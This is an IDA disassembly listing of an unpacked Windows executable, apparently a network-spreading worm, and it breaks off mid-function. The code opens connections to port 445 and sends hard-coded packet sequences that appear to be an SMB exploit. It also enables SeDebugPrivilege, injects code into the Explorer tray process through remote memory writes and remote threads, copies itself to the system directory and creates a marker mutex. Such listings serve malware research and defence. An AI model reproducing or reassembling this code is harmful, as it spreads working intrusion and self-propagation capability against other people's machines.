;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6FD0ACABF4ED45CA283D35DDC50A54BF
; File Name : u:\work\6fd0acabf4ed45ca283d35ddc50a54bf_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31000000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31001000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31001000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31001004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31001008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3100100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31002264+1D�r
dword_31001010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31001014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31002264+4E�r ...
dword_31001018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3100101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31001020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31001024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31001028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3100102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31001030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31001034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31001038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31001040 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31001044 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_31001048 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_3100104C dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31001050 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_31001054 dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31001058 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_310026A6+37�r
dword_3100105C dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_310026A6+3D�r
dword_31001060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31001064 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31001068 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3100106C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31001070 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31001074 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31001078 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31002542+8F�r
dword_3100107C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31001262+272�r ...
dword_31001080 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31001ADF+E2�r ...
dword_31001084 dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_31001088 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_3100108C dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31001851+2C�r
dword_31001090 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_31001E06+A4�r
dword_31001094 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_31001098 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_310019B3+19�r ...
dword_3100109C dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_31002310+92�r
dword_310010A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31001D8A�r
dword_310010A4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_310010A8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_310010AC dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_310019B3+12�r
dword_310010B0 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_310010B4 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_310010B8 dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_310010BC dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_31001C18+66�r ...
dword_310010C0 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_310010C4 dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_310010C8 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_310026A6+8F�r
dword_310010CC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31002476+C3�r
dword_310010D0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_310010D4 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31002476+F�r
dword_310010D8 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_310010DC dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_310010E0 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_3100202D+58�r
align 8
dword_310010E8 dd 77C46EB0h ; resolved to->MSVCRT.memcmpdword_310010EC dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31002928+68�r
; ---------------------------------------------------------------------------
loc_310010F0: ; DATA XREF: UPX0:loc_31002BD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_310010F4 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_31002310+79�r ...
dword_310010F8 dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31001AC9+1�r ...
dword_310010FC dd 77C371BCh ; resolved to->MSVCRT.sranddword_31001100 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_31001104 dd 77C478A0h ; resolved to->MSVCRT.strlendword_31001108 dd 77C475F0h ; resolved to->MSVCRT.memset align 10h
dword_31001110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31001114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31001118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3100111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_31001ADF+8B�r ...
dd 0
dword_31001124 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_31002A44+B3�r
dword_31001128 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_31002A44+9E�r
dword_3100112C dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_31002A44+89�r
dword_31001130 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31001134 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:31002184�r
dd 0
dword_3100113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31001140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31001144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31001148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3100114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31001150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31001154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31001158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_31001C18+AC�r
dword_3100115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_310020F4+D�r
dword_31001160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_31001C18+F0�r
dword_31001164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31001168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_31001ADF+67�r ...
dword_3100116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31001262+1D8�r ...
dword_31001170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_31001ADF+11B�r
dword_31001174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_31001ADF+122�r
align 10h
dword_31001180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
; =============== S U B R O U T I N E =======================================
sub_31001190 proc near ; CODE XREF: sub_31002928+BF�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31001034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 8
push 1
push edi
push edi
push ebx
call esi ; CryptAcquireContextA
test eax, eax
jnz short loc_310011BD
push 1
pop eax
jmp short loc_310011DB
; ---------------------------------------------------------------------------
loc_310011BD: ; CODE XREF: sub_31001190+19�j
; sub_31001190+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31001038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_310011DB: ; CODE XREF: sub_31001190+2B�j
pop edi
pop esi
pop ebx
retn
sub_31001190 endp
; =============== S U B R O U T I N E =======================================
sub_310011DF proc near ; CODE XREF: sub_31002928+10F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3100102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31001030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_310011DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310011FB proc near ; CODE XREF: sub_31002928+EA�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3100101C ; CryptCreateHash
test eax, eax
jnz short loc_31001221
push 1
pop eax
jmp short loc_3100125E
; ---------------------------------------------------------------------------
loc_31001221: ; CODE XREF: sub_310011FB+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31001020 ; CryptHashData
test eax, eax
jnz short loc_3100123A
push 2
pop edi
jmp short loc_31001253
; ---------------------------------------------------------------------------
loc_3100123A: ; CODE XREF: sub_310011FB+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31001024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_31001253: ; CODE XREF: sub_310011FB+3D�j
push [ebp+arg_0]
call dword_31001028 ; CryptDestroyHash
mov eax, edi
loc_3100125E: ; CODE XREF: sub_310011FB+24�j
pop edi
pop esi
pop ebp
retn
sub_310011FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001262 proc near ; CODE XREF: sub_31001F41+36�p
; sub_31001FA5+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31002BA0
mov eax, dword_310049CC
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_310049D0
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31001158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_310017C2
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3100115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_31001084 ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_310049C0
push eax
call dword_3100111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_310012D5: ; CODE XREF: sub_31001262+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_310012D5
push 60h
lea eax, [ebp+var_E4]
push offset dword_310044E0
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31002B98 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31002B92 ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31002B92 ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31002B98 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31002B8C ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31002B8C ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31001160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31001164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_310017B8
mov esi, dword_31001080
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31001168
push 89h
push offset dword_310042C8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A8h
push offset dword_31004354
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0DEh
push offset dword_31004400
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp eax, 46h
jl loc_310017AD
cmp [ebp+var_730], 31h
jnz loc_31001658
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31002B8C ; memset
add esp, 0Ch
push offset byte_31004000
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_3100107C ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_31002B98 ; memcpy
mov eax, dword_31004906
add esp, 0Ch
mov [ebp+var_798], eax
loc_310014F9: ; CODE XREF: sub_31001262+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 68h
push offset dword_31004544
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0A0h
push offset dword_310045B0
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
cmp [ebp+arg_0], 0
jz loc_31001748
push 68h
lea eax, [ebp+var_89E4]
push offset dword_31004768
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_31002B98 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_310047D4
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_31002B98 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_31004848
push eax
call sub_31002B98 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3100116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_310017AD
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_310017A0
; ---------------------------------------------------------------------------
loc_31001658: ; CODE XREF: sub_31001262+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31002B8C ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_310049B8
push eax
call sub_31002B98 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31004940
push eax
call sub_31002B98 ; memcpy
add esp, 40h
push offset byte_31004000
call sub_31002B92 ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_31004000
push eax
call sub_31002B98 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_310016F4: ; CODE XREF: sub_31001262+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_310016F4
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_31002B8C ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_31002B8C ; memset
add esp, 18h
jmp loc_310014F9
; ---------------------------------------------------------------------------
loc_31001748: ; CODE XREF: sub_31001262+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_31004654
push eax
call sub_31002B98 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_31002B98 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_310046D4
push eax
call sub_31002B98 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_310017A0: ; CODE XREF: sub_31001262+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_310017AD: ; CODE XREF: sub_31001262+1AD�j
; sub_31001262+1E1�j ...
push 2
push [ebp+var_4]
call dword_31001170 ; shutdown
loc_310017B8: ; CODE XREF: sub_31001262+166�j
push [ebp+var_4]
call dword_31001174 ; closesocket
pop esi
loc_310017C2: ; CODE XREF: sub_31001262+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_31001262 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310017C9 proc near ; CODE XREF: UPX0:loc_31001DCA�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_31001090 ; LoadLibraryA
mov esi, dword_3100108C
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_3100184D
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_3100184D
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_3100184D
lea eax, [ebp+var_C]
push eax
push 20h
call dword_31001088 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_3100184D: ; CODE XREF: sub_310017C9+28�j
; sub_310017C9+37�j ...
pop edi
pop esi
leave
retn
sub_310017C9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001851 proc near ; CODE XREF: UPX0:31001DDE�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_31004FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_310010A0 ; GetModuleHandleA
mov esi, dword_3100108C
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_31001898
loc_31001894: ; CODE XREF: sub_31001851+54�j
push 1
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_31001898: ; CODE XREF: sub_31001851+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_31001894
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_31001110 ; FindWindowA
test eax, eax
jnz short loc_310018C6
call dword_31001114 ; GetForegroundWindow
test eax, eax
jnz short loc_310018C6
push 2
jmp short loc_310018E9
; ---------------------------------------------------------------------------
loc_310018C6: ; CODE XREF: sub_31001851+65�j
; sub_31001851+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_31001118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_3100109C ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_310018EC
push 3
loc_310018E9: ; CODE XREF: sub_31001851+45�j
; sub_31001851+73�j
pop eax
jmp short loc_31001957
; ---------------------------------------------------------------------------
loc_310018EC: ; CODE XREF: sub_31001851+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_31001098
test eax, eax
jz short loc_3100194A
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_31001094 ; WriteProcessMemory
push dword_31004FC4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_31001936
push eax
call esi ; CloseHandle
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_31001936: ; CODE XREF: sub_31001851+DE�j
push offset aUterm13 ; "uterm13"
call sub_3100198A
pop ecx
mov [ebp+var_4], 5
jmp short loc_31001951
; ---------------------------------------------------------------------------
loc_3100194A: ; CODE XREF: sub_31001851+B2�j
mov [ebp+var_4], 4
loc_31001951: ; CODE XREF: sub_31001851+E3�j
; sub_31001851+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_31001957: ; CODE XREF: sub_31001851+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_31001851 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3100195C proc near ; CODE XREF: sub_31001C18+B�p
; UPX0:31001DA0�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_310010A4 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_310010FC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_3100195C endp
; =============== S U B R O U T I N E =======================================
sub_3100198A proc near ; CODE XREF: sub_31001851+EA�p
; UPX0:31001DAA�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_310010A8 ; CreateMutexA
retn
sub_3100198A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001999 proc near ; CODE XREF: sub_31001E06+E3�p
; sub_31001E06+EE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
pop ebp
retn
sub_31001999 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_310019B3 proc near ; CODE XREF: sub_31001C18+12C�p
; sub_31001FA5+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_310010AC ; CreateThread
push eax
call dword_31001098 ; CloseHandle
pop ebp
retn
sub_310019B3 endp
; =============== S U B R O U T I N E =======================================
sub_310019D4 proc near ; CODE XREF: sub_31002476+3B�p
; sub_31002542+64�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_310019FC
loc_310019E5: ; CODE XREF: sub_310019D4+26�j
call dword_310010F8 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_310019E5
loc_310019FC: ; CODE XREF: sub_310019D4+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_310019D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31001A04 proc near ; CODE XREF: sub_310026A6+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_31002B8C ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_310010B0 ; CreateProcessA
